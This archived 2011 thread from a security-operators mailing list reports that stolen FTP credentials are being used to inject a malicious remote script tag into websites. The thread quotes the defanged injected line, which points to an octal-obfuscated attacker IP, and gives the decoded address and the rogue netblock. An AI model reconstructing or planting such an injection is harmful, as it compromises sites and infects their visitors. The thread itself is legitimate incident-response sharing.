[nsp-sec] Stolen FTP credentials
Smith, Donald
Donald.Smith at qwest.com
Wed Mar 16 12:33:38 EDT 2011
Can we share the inserted text with our customers so they can look for it?
Sharing: Author's permission required.
Donald.Smith at qwest.com
> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-
> bounces at puck.nether.net] On Behalf Of Carles Fragoso
> Sent: Wednesday, March 16, 2011 9:50 AM
> To: Thomas Hungenberg
> Cc: nsp-sec NSP
> Subject: Re: [nsp-sec] Stolen FTP credentials
>
> ----------- nsp-security Confidential --------
>
> Hi Thomas,
>
> Several ISPs here in Spain have confirmed us this behaviour ...
>
> ... same inserted script ...
>
> < script src='hxxp://0133.0331.0242.0034/0314.php?js'>< / script >
>
> ... performed through FTP connnections (downloading index file and
> uploading it with modified code) from a couple of different IP
> addresses (Romania and USA).
>
> Those who have replied my notification, have confirmed that the
> credentials were fresh and were accessed.
>
> Regards,
>
> -- Carlos Fragoso (CESICAT-CERT)
>
> On Mar 16, 2011, at 4:16 PM, Thomas Hungenberg wrote:
>
> ----------- nsp-security Confidential --------
>
>
> It appears the stolen FTP credentials are used to inject the following
> code
> into corresponding websites (XXX inserted):
> <scrXXipt src='htXXXtp://0133.0331.0242.0034/0314.php?js'></scrXXXipt>
>
> 0133.0331.0242.0034 = 91.217.162.28
>
> Known rogue netblock:
>
> inetnum: 91.217.162.0 - 91.217.162.255
> netname: VOEJNA-NET
> descr: Voejkova Nadezhda
> country: UA
>
> Cheers,
> Thomas
>
> Thomas Hungenberg schrieb:
> ----------- nsp-security Confidential --------
>
> Hi,
>
> please find below a list of stolen FTP credentials found in recent
> dropzone data.
>
> Format: ASN | IP | CC | hostname | username | sanitized password
>
>
> - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net<mailto:nsp-security at puck.nether.net>
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-
> security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-
> security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
This communication is the property of Qwest and may contain confidential or
privileged information. Unauthorized use of this communication is strictly
prohibited and may be unlawful. If you have received this communication
in error, please immediately notify the sender by reply e-mail and destroy
all copies of the communication and any attachments.
More information about the nsp-security
mailing list